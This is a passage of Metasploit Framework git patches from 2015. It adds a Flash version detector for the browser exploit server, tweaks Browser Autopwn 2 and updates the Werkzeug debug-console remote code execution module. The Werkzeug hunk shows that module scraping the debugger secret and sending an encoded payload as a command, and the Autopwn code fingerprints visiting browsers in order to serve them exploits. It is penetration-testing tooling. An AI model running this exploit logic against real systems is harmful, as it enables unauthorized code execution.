--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -547,7 +547,7 @@ module Msf
     end
 
     def load_swf_detection
-      path = ::File.join(Msf::Config.data_directory, 'flash_detector', 'detector.swf')
+      path = ::File.join(Msf::Config.data_directory, 'flash_detector', 'flashdetector.swf')
       swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
       swf

From b72ba7f51cbda1571284186c05e79a688dee12ff Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 13 Jul 2015 18:26:02 -0500
Subject: [PATCH 0762/1013] Add AS2 flash detection code

---
 data/flash_detector/flashdetector.swf         | Bin 0 -> 455 bytes
 .../flash_detector/bin/expressInstall.swf     | Bin 0 -> 773 bytes
 external/source/flash_detector/bin/index.html |  39 +++++++++++++
 .../source/flash_detector/bin/js/swfobject.js |   4 ++
 .../flash_detector/flash_detector.as2proj     |  55 ++++++++++++++++++
 external/source/flash_detector/src/Main.as    |  31 ++++++++++
 6 files changed, 129 insertions(+)
 create mode 100755 data/flash_detector/flashdetector.swf
 create mode 100755 external/source/flash_detector/bin/expressInstall.swf
 create mode 100755 external/source/flash_detector/bin/index.html
 create mode 100755 external/source/flash_detector/bin/js/swfobject.js
 create mode 100755 external/source/flash_detector/flash_detector.as2proj
 create mode 100755 external/source/flash_detector/src/Main.as

diff --git a/data/flash_detector/flashdetector.swf b/data/flash_detector/flashdetector.swf
new file mode 100755
index 0000000000000000000000000000000000000000..30293d10dc9a08eefe98bd5f82104310b1dbdf91
GIT binary patch
literal 455
zcmV;&0XY6cS5pX;0ssJb+DuYSZ__{!eO^2DhC<q!f-e!`T0j*Cj`Sl`MG7Km<RGrW
zjW(%^o3(aV(Eb8?DmP0Aapm{$kIKy2MeJdA-|U-tGqZb%_z#d)z>@$+;+9r-4YVc!
znS<UoSvpN-vq?VxoG+E#9p%Lex4lp>>-sky!+U1SQlI7}mdbrp#uj=7tK8c%w`X^F
z!2s&gDYGKxaeEl9XkX-Wg?V0<sEl^nT~!JfoOgO<ow}f_DnBjC!WGKmOPla1Y(*~Y
z;swq%k&lhh2Fe&<Fr6wlF}k7>mKL>uL_bM>3A_s!1by$ik=$*#gIB1#h#5qI6xp``
zBCXdE2^q%Rs*HR<XUulZ+c-;!hLbu%1S!V^g0unMn=Kw(v;$$kE;6khHc`iofW#qD
z!_)_o*uNTn;=4rW6J9cAg?nCe-K*Un-_;}^#QZu`S}&_R@Swd+AU8agoBwerdaLb7
zkZb>kAPM#+oIk?z_cdJ(X*P*>KODX0ZJUWPd=Q?U)EkYIh=Mp|iAQ@W4#GEdyzUcY
x^kFbPnvDj-G2B^Un{VOY&`+92m9~?Qn@m#p{=zK9A;G@@009600{~n!e;KWd)#3mE

literal 0
HcmV?d00001

diff --git a/external/source/flash_detector/bin/expressInstall.swf b/external/source/flash_detector/bin/expressInstall.swf
new file mode 100755
index 0000000000000000000000000000000000000000..86958bf3a726d6e946e36fb5d34aaf315c9f0b24
GIT binary patch
literal 773
zcmV+g1N!_!S5pQ-1pokeoP|`)Pt-sZ|8;lSEwI4K*P@gUAu&n}HSvZZ1PFwL1zA83
z#=~qoK%v_<?G)UziE`q&i6KUho;-Td#D9RR@#@hd|H1mEU07Bz_Aq_#H}7kH@6C9~
zYQV-EvI-UwwOVaf9S5Mmt8XYcqYt^hGp%>y{QdanFT+{w@Z$&6T61KWAk)|Bv_e13
zkzQ;4o&u7j&L%&Rbo@gZgY7bt`wO<^ArQ<L+n&h;hj2HAZ#lboE-D@$T?!pTSg!K|
zmI=e=%wKT?_YavJ1z2#)p3SA3RgRbSP#|>VUco)Icx1Iz$4zdt3Vd!_J~za6aTSF^
zv*wWj_qQlBDW*%Qh0S3w+b%KVVDs71dTF1GvFIK}IVLX)XduinxNUQ@0WC30>N}o!
zfs~oyyJbqvCJncY%}OA6838v!-x3v2KKE$REi=oZ<i;MK56Qqsfr&l%%rVI)jQFCG
zuqT8!rR)C;uX|xh-?3S+7avcLU3E(4b4TdG(T>hS;l>^CCrO`0sUmoQT`uOOu;q$6
z<1wpLl5wyqJ7`kX;<6{Fxuz}PE2`~CqyDMTstKsdnp_h_xh7Y--z9J#Qch{r3^Ix|
zY?;Y7Ii^WhkbL|$fhUn|CW@qLyV8B;f9`SK)?zc-Ru5WDQM`J@cCFfi%&#QSu{?Cr
z+dO47+WT0El2ODo)ND#oJJ!}4Kqmp6SAi}9x(K+2g<_uQx;mdgu9>dfO#WmHmO~fB
zwl@V6VL+ECF##orl&8!NIZCpil=6m7F5}+VAx1_(hoWP3OC?`ddg2}8P?yWZU&#pU
zyAA|S`>(kLz(c%xfPHqz0>igFF-4=}MthU|rRVb?Scz+2sQcc%_lSyYh1whUsV`!p
zKbnU;b*BUBKqL9hX!lleS`s;^YU+TtJS}a8{^W9)Z0I-Gn1C1`i8`)kF72nuKvgp>
z7h-#+EfR^Hl<YnEj7CA^q1D?n(;0kA_mF&tct=P6=apwmK5fVHnM)#jJ}R}}%;`Mr
D8O3}b

literal 0
HcmV?d00001

diff --git a/external/source/flash_detector/bin/index.html b/external/source/flash_detector/bin/index.html
new file mode 100755
index 0000000000..20a2ff2f1b
--- /dev/null
+++ b/external/source/flash_detector/bin/index.html
@@ -0,0 +1,39 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+	<meta charset="utf-8"/>
+	<title>flash_detector</title>
+	<meta name="description" content="" />
+	
+	<script src="js/swfobject.js"></script>
+	<script>
+		var flashvars = {
+		};
+		var params = {
+			menu: "false",
+			scale: "noScale",
+			allowFullscreen: "true",
+			allowScriptAccess: "always",
+			bgcolor: ""
+		};
+		var attributes = {
+			id:"flashdetector"
+		};
+		swfobject.embedSWF(
+			"flashdetector.swf", 
+			"altContent", "100%", "100%", "8.0.0", 
+			"expressInstall.swf", 
+			flashvars, params, attributes);
+	</script>
+	<style>
+		html, body { height:100%; overflow:hidden; }
+		body { margin:0; }
+	</style>
+</head>
+<body>
+	<div id="altContent">
+		<h1>flash_detector</h1>
+		<p><a href="http://www.adobe.com/go/getflashplayer">Get Adobe Flash player</a></p>
+	</div>
+</body>
+</html>
\ No newline at end of file
diff --git a/external/source/flash_detector/bin/js/swfobject.js b/external/source/flash_detector/bin/js/swfobject.js
new file mode 100755
index 0000000000..8eafe9dd83
--- /dev/null
+++ b/external/source/flash_detector/bin/js/swfobject.js
@@ -0,0 +1,4 @@
+/*	SWFObject v2.2 <http://code.google.com/p/swfobject/> 
+	is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> 
+*/
+var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y<X;Y++){U[Y]()}}function K(X){if(J){X()}else{U[U.length]=X}}function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load",Y,false)}else{if(typeof j.addEventListener!=D){j.addEventListener("load",Y,false)}else{if(typeof O.attachEvent!=D){i(O,"onload",Y)}else{if(typeof O.onload=="function"){var X=O.onload;O.onload=function(){X();Y()}}else{O.onload=Y}}}}}function h(){if(T){V()}else{H()}}function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setAttribute("type",q);var Z=X.appendChild(aa);if(Z){var Y=0;(function(){if(typeof Z.GetVariable!=D){var ab=Z.GetVariable("$version");if(ab){ab=ab.split(" ")[1].split(",");M.pv=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}else{if(Y<10){Y++;setTimeout(arguments.callee,10);return}}X.removeChild(aa);Z=null;H()})()}else{H()}}function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[af].id;var ab=o[af].callbackFn;var aa={success:false,id:Y};if(M.pv[0]>0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad<ac;ad++){if(X[ad].getAttribute("name").toLowerCase()!="movie"){ah[X[ad].getAttribute("name")]=X[ad].getAttribute("value")}}P(ai,ah,Y,ab)}else{p(ae);if(ab){ab(aa)}}}}}else{w(Y,true);if(ab){var Z=z(Y);if(Z&&typeof Z.SetVariable!=D){aa.success=true;aa.ref=Z}ab(aa)}}}}}function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typeof Y.SetVariable!=D){X=Y}else{var Z=Y.getElementsByTagName(r)[0];if(Z){X=Z}}}return X}function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X);if(ae){if(ae.nodeName=="OBJECT"){l=g(ae);Q=null}else{l=ae;Q=X}aa.id=R;if(typeof aa.width==D||(!/%$/.test(aa.width)&&parseInt(aa.width,10)<310)){aa.width="310"}if(typeof aa.height==D||(!/%$/.test(aa.height)&&parseInt(aa.height,10)<137)){aa.height="137"}j.title=j.title.slice(0,47)+" - Flash Player Installation";var ad=M.ie&&M.win?"ActiveX":"PlugIn",ac="MMredirectURL="+O.location.toString().replace(/&/g,"%26")+"&MMplayerType="+ad+"&MMdoctitle="+j.title;if(typeof ab.flashvars!=D){ab.flashvars+="&"+ac}else{ab.flashvars=ac}if(M.ie&&M.win&&ae.readyState!=4){var Y=C("div");X+="SWFObjectNew";Y.setAttribute("id",X);ae.parentNode.insertBefore(Y,ae);ae.style.display="none";(function(){if(ae.readyState==4){ae.parentNode.removeChild(ae)}else{setTimeout(arguments.callee,10)}})()}u(aa,ab,X)}}function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNode.insertBefore(X,Y);X.parentNode.replaceChild(g(Y),X);Y.style.display="none";(function(){if(Y.readyState==4){Y.parentNode.removeChild(Y)}else{setTimeout(arguments.callee,10)}})()}else{Y.parentNode.replaceChild(g(Y),Y)}}function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML}else{var Y=ab.getElementsByTagName(r)[0];if(Y){var ad=Y.childNodes;if(ad){var X=ad.length;for(var Z=0;Z<X;Z++){if(!(ad[Z].nodeType==1&&ad[Z].nodeName=="PARAM")&&!(ad[Z].nodeType==8)){aa.appendChild(ad[Z].cloneNode(true))}}}}}return aa}function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(typeof ai.id==D){ai.id=Y}if(M.ie&&M.win){var ah="";for(var ae in ai){if(ai[ae]!=Object.prototype[ae]){if(ae.toLowerCase()=="data"){ag.movie=ai[ae]}else{if(ae.toLowerCase()=="styleclass"){ah+=' class="'+ai[ae]+'"'}else{if(ae.toLowerCase()!="classid"){ah+=" "+ae+'="'+ai[ae]+'"'}}}}}var af="";for(var ad in ag){if(ag[ad]!=Object.prototype[ad]){af+='<param name="'+ad+'" value="'+ag[ad]+'" />'}}aa.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'+ah+">"+af+"</object>";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab<ac;ab++){I[ab][0].detachEvent(I[ab][1],I[ab][2])}var Z=N.length;for(var aa=0;aa<Z;aa++){y(N[aa])}for(var Y in M){M[Y]=null}M=null;for(var X in swfobject){swfobject[X]=null}swfobject=null})}}();return{registerObject:function(ab,X,aa,Z){if(M.w3&&ab&&X){var Y={};Y.id=ab;Y.swfVersion=X;Y.expressInstall=aa;Y.callbackFn=Z;o[o.length]=Y;w(ab,false)}else{if(Z){Z({success:false,id:ab})}}},getObjectById:function(X){if(M.w3){return z(X)}},embedSWF:function(ab,ah,ae,ag,Y,aa,Z,ad,af,ac){var X={success:false,id:ah};if(M.w3&&!(M.wk&&M.wk<312)&&ab&&ah&&ae&&ag&&Y){w(ah,false);K(function(){ae+="";ag+="";var aj={};if(af&&typeof af===r){for(var al in af){aj[al]=af[al]}}aj.data=ab;aj.width=ae;aj.height=ag;var am={};if(ad&&typeof ad===r){for(var ak in ad){am[ak]=ad[ak]}}if(Z&&typeof Z===r){for(var ai in Z){if(typeof am.flashvars!=D){am.flashvars+="&"+ai+"="+Z[ai]}else{am.flashvars=ai+"="+Z[ai]}}}if(F(Y)){var an=u(aj,am,ah);if(aj.id==ah){w(ah,true)}X.success=true;X.ref=an}else{if(aa&&A()){aj.data=aa;P(aj,am,ah,ac);return}else{w(ah,true)}}if(ac){ac(X)}})}else{if(ac){ac(X)}}},switchOffAutoHideShow:function(){m=false},ua:M,getFlashPlayerVersion:function(){return{major:M.pv[0],minor:M.pv[1],release:M.pv[2]}},hasFlashPlayerVersion:F,createSWF:function(Z,Y,X){if(M.w3){return u(Z,Y,X)}else{return undefined}},showExpressInstall:function(Z,aa,X,Y){if(M.w3&&A()){P(Z,aa,X,Y)}},removeSWF:function(X){if(M.w3){y(X)}},createCSS:function(aa,Z,Y,X){if(M.w3){v(aa,Z,Y,X)}},addDomLoadEvent:K,addLoadEvent:s,getQueryParamValue:function(aa){var Z=j.location.search||j.location.hash;if(Z){if(/\?/.test(Z)){Z=Z.split("?")[1]}if(aa==null){return L(Z)}var Y=Z.split("&");for(var X=0;X<Y.length;X++){if(Y[X].substring(0,Y[X].indexOf("="))==aa){return L(Y[X].substring((Y[X].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(a){var X=c(R);if(X&&l){X.parentNode.replaceChild(l,X);if(Q){w(Q,true);if(M.ie&&M.win){l.style.display="block"}}if(E){E(B)}}a=false}}}}();
\ No newline at end of file
diff --git a/external/source/flash_detector/flash_detector.as2proj b/external/source/flash_detector/flash_detector.as2proj
new file mode 100755
index 0000000000..3043e32837
--- /dev/null
+++ b/external/source/flash_detector/flash_detector.as2proj
@@ -0,0 +1,55 @@
+<?xml version="1.0" encoding="utf-8"?>
+<project>
+  <!-- Output SWF options -->
+  <output>
+    <movie disabled="False" />
+    <movie input="" />
+    <movie path="bin\flashdetector.swf" />
+    <movie fps="30" />
+    <movie width="800" />
+    <movie height="600" />
+    <movie version="8" />
+    <movie background="#FFFFFF" />
+  </output>
+  <!-- Other classes to be compiled into your SWF -->
+  <classpaths>
+    <class path="src" />
+  </classpaths>
+  <!-- Build options -->
+  <build>
+    <option verbose="False" />
+    <option strict="False" />
+    <option infer="False" />
+    <option useMain="True" />
+    <option useMX="False" />
+    <option warnUnusedImports="False" />
+    <option traceMode="FlashConnectExtended" />
+    <option traceFunction="" />
+    <option libraryPrefix="" />
+    <option excludeFile="" />
+    <option groupClasses="False" />
+    <option frame="1" />
+    <option keep="True" />
+  </build>
+  <!-- Class files to compile (other referenced classes will automatically be included) -->
+  <compileTargets>
+    <compile path="src\Main.as" />
+  </compileTargets>
+  <!-- Assets to embed into the output SWF -->
+  <library>
+    <!-- example: <asset path="..." id="..." update="..." glyphs="..." mode="..." place="..." sharepoint="..." /> -->
+  </library>
+  <!-- Paths to exclude from the Project Explorer tree -->
+  <hiddenPaths>
+    <!-- example: <hidden path="..." /> -->
+  </hiddenPaths>
+  <!-- Executed before build -->
+  <preBuildCommand />
+  <!-- Executed after build -->
+  <postBuildCommand alwaysRun="False" />
+  <!-- Other project options -->
+  <options>
+    <option showHiddenPaths="False" />
+    <option testMovie="Default" />
+  </options>
+</project>
\ No newline at end of file
diff --git a/external/source/flash_detector/src/Main.as b/external/source/flash_detector/src/Main.as
new file mode 100755
index 0000000000..d21babff27
--- /dev/null
+++ b/external/source/flash_detector/src/Main.as
@@ -0,0 +1,31 @@
+import flash.external.ExternalInterface
+import System.capabilities
+
+class Main 
+{
+	
+	public static function main(swfRoot:MovieClip):Void 
+	{
+		// entry point
+		var app:Main = new Main();
+	}
+	
+	public function Main() 
+	{
+		var version:String = getVersion()
+		ExternalInterface.call("setFlashVersion", version)
+	}
+
+	private function getVersion():String
+	{
+		try {
+			var version:String = capabilities.version
+			version = version.split(" ")[1]
+			version = version.split(",").join(".")
+			return version
+		} catch (err:Error) {
+			return ""
+		}
+	}
+	
+}
\ No newline at end of file

From 57f62ffa76d6feeb7b23b0e4ef639f7e709d770c Mon Sep 17 00:00:00 2001
From: h00die <mike@shorebreaksecurity.com>
Date: Mon, 13 Jul 2015 20:18:45 -0400
Subject: [PATCH 0763/1013] changed URI to TARGETURI as per comments

---
 modules/exploits/multi/http/werkzeug_debug_rce.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb
index 3ed9af96a4..0c5a6d662c 100644
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@@ -36,7 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('URI',[true,'URI to the console','/console'])
+        OptString.new('TARGETURI',[true,'URI to the console','/console'])
       ], self.class
     )
   end
@@ -44,7 +44,7 @@ class Metasploit4 < Msf::Exploit::Remote
   def check
     res = send_request_cgi({
         'method'   => 'GET',
-        'uri'      => normalize_uri(datastore['URI'])
+        'uri'      => normalize_uri(datastore['TARGETURI'])
     })
     #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
     if res and res.body =~ /Werkzeug powered traceback interpreter/
@@ -57,14 +57,14 @@ class Metasploit4 < Msf::Exploit::Remote
     #first we need to get the SECRET code
     res = send_request_cgi({
         'method'   => 'GET',
-        'uri'      => normalize_uri(datastore['URI'])
+        'uri'      => normalize_uri(datastore['TARGETURI'])
     })
     if res and res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
       secret = res.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
       vprint_status("Secret Code: #{secret}")
       res = send_request_cgi({
           'method'   => 'GET',
-          'uri'      => normalize_uri(datastore['URI']),
+          'uri'      => normalize_uri(datastore['TARGETURI']),
           'vars_get' => {
               '__debugger__' => 'yes',
               'cmd' => payload.encoded,

From 8384be64664541c5569686f3a606ed0bae56e19c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 01:02:01 -0500
Subject: [PATCH 0764/1013] Fix rand_text_alpha and bump max exploit count to
 21

---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 8 ++++----
 modules/auxiliary/server/browser_autopwn2.rb          | 2 +-
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index da06dad2fd..4a634ec2f6 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -87,10 +87,10 @@ module Msf
       # Requirements are conditions that the browser must have in order to be exploited.
       @requirements = extract_requirements(self.module_info['BrowserRequirements'] || {})
 
-      @info_receiver_page     = rand_text_alpha(5)
-      @exploit_receiver_page  = rand_text_alpha(6)
-      @noscript_receiver_page = rand_text_alpha(7)
-      @flash_swf              = "#{rand_text_alpha(9)}.swf"
+      @info_receiver_page     = Rex::Text.rand_text_alpha(5)
+      @exploit_receiver_page  = Rex::Text.rand_text_alpha(6)
+      @noscript_receiver_page = Rex::Text.rand_text_alpha(7)
+      @flash_swf              = "#{Rex::Text.rand_text_alpha(9)}.swf"
 
       register_options(
       [
diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb
index 96558e0c26..e514547b7d 100644
--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
 
     register_advanced_options([
         OptInt.new('ExploitReloadTimeout', [false, 'Number of milliseconds before trying the next exploit', 3000]),
-        OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 20]),
+        OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 21]),
         OptString.new('HTMLContent', [false, 'HTML Content', '']),
         OptAddressRange.new('AllowedAddresses', [false, "A range of IPs you're interested in attacking"]),
         OptInt.new('MaxSessionCount', [false, 'Number of sessions to get', -1]),

From 0582e7e3caa6841c09348ad771c7398461347b30 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 01:25:41 -0500
Subject: [PATCH 0765/1013] Return nil instead of "null"

A scenario is when FF disables Flash, BES returns "null", and when
modules try to use Gem::Version, the "null" is considered a malformed
data and it won't be able to continue.
---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 4a634ec2f6..1ad7cffa70 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -303,7 +303,7 @@ module Msf
         parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
         vprint_status("Received sniffed browser data over POST:")
         vprint_line("#{parsed_body}.")
-        parsed_body.each { |k, v| profile[k.to_sym] = v.first }
+        parsed_body.each { |k, v| profile[k.to_sym] = (v.first == 'null' ? nil : v.first) }
         found_ua_name = parsed_body['ua_name']
         found_ua_ver = parsed_body['ua_ver']
 

From 2276e355aa82a5eaf7f86b556aa3ea54de51f198 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 10:51:15 -0500
Subject: [PATCH 0766/1013] Fix a typo

---
 spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index c2a5317e60..0a85f94d56 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -11,7 +11,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
 
 
   def mock_note_destroy
-    # The destory method doesn't pass the note as an argument startlike framework.jobs_stop_job.
+    # The destroy method doesn't pass the note as an argument startlike framework.jobs_stop_job.
     # So here's I'm just gonna clear them all, and that sort of mimics #destroy.
     framework = double('Msf::Framework', datastore: {})
 

From 100d3c8d465c351b4808d9dca59b74482fd0394f Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 14 Jul 2015 11:40:28 -0500
Subject: [PATCH 0767/1013] A number of small fixes for BAPv2

* Use module.register_parent() to pass WORKSPACE and other fields
* Prevent partial resource matching in URIs
* Make disclosure_date sorting resilient
---
 lib/msf/core/exploit/browser_autopwnv2.rb | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index f07e990b8c..2216a4242c 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -140,10 +140,9 @@ module Msf
       xploit.datastore['DisablePayloadHandler'] = true
       xploit.datastore['BrowserProfilePrefix']  = browser_profile_prefix
       xploit.datastore['URIPATH']               = "/#{assign_module_resource}"
-      xploit.datastore['WORKSPACE']             = self.workspace
 
-      # TODO: Add BAPv2 tracking information (?) - HD
-      # TODO: Change exploit output options?     - HD
+      # Register this module as a child and copy datastore options
+      xploit.register_parent(self)
     end
 
 
@@ -152,12 +151,13 @@ module Msf
     # @param resource [String] The resource to check.
     # @return [TrueClass] Resource is taken.
     # @return [FalseClass] Resource is not taken.
-    # TODO: Prevent partial prefix match - HD
     def is_resource_taken?(resource)
       taken = false
 
       bap_exploits.each do |m|
-        return true if m.datastore['URIPATH'] == resource
+        # Prevent partial matching of one resource within another
+        return true if m.datastore['URIPATH'].index(resource)
+        return true if resource.index(m.datastore['URIPATH'])
       end
 
       taken
@@ -206,8 +206,10 @@ module Msf
     # @return [Hash] A hash with each module list sorted by disclosure date.
     def sort_date_in_group(bap_groups)
       bap_groups.each_pair do |ranking, module_list|
-        # TODO: Handle wonky dates in local modules better - HD
-        bap_groups[ranking] = module_list.sort_by {|m| Date.parse(m.disclosure_date.to_s)}.reverse
+        bap_groups[ranking] = module_list.sort_by {|m|
+          dstr = m.disclosure_date || "1970-01-01"
